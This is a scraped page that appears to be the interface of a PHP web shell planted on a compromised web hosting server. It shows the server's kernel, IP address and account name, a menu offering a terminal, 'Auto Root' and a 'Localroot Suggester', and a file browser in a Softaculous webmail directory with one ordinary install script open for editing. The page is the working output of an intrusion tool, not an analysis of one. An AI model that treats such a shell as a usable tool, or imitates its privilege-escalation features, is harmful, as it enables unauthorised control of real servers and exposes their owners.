Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
webmail /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php53
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php56
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php71
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php81
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php82
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
Core.config.json
4.25
KB
-rw-r--r--
2025-01-20 04:28
_edit.php
3.58
KB
-rw-r--r--
2021-12-23 06:54
_edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
_extend.php
1.51
KB
-rw-r--r--
2021-12-23 06:54
changelog.txt
2.59
KB
-rw-r--r--
2025-10-23 04:51
clone.php
4.99
KB
-rw-r--r--
2025-10-23 07:27
config.json
7.13
KB
-rw-r--r--
2025-01-20 04:28
db_init.php
619
B
-rw-r--r--
2021-12-23 06:54
encryption_key.php
8
B
-rw-r--r--
2024-09-19 06:58
fileindex.php
188
B
-rw-r--r--
2025-10-23 04:51
import.php
3.84
KB
-rw-r--r--
2025-10-23 07:27
info.xml
3.88
KB
-rw-r--r--
2025-10-23 04:51
install.js
1.29
KB
-rw-r--r--
2021-12-23 06:54
install.php
5.88
KB
-rw-r--r--
2025-10-23 07:27
install.xml
3.58
KB
-rw-r--r--
2021-12-23 06:54
md5
4.04
KB
-rw-r--r--
2025-10-23 07:27
migrate.php
1.28
KB
-rw-r--r--
2021-12-23 06:54
notes.txt
1.57
KB
-rw-r--r--
2025-07-04 07:00
upgrade.php
5.73
KB
-rw-r--r--
2025-10-23 07:27
upgrade.xml
627
B
-rw-r--r--
2024-09-19 06:58
webmail.sql
42.15
KB
-rw-r--r--
2025-10-23 04:51
webmail.zip
66.86
MB
-rw-r--r--
2025-10-23 04:51
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // extend.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __softname_funcname() ///////////////////////////////////////// ////////////////////////////////////////// // Note : The path of the upgrade package // is $software['path'].'/' . So to // access other files use // $software['path'].'/other_file.ext' ////////////////////////////////////////// //Change password using old method function __ad_pass_md5($password){ return md5($password); } ?>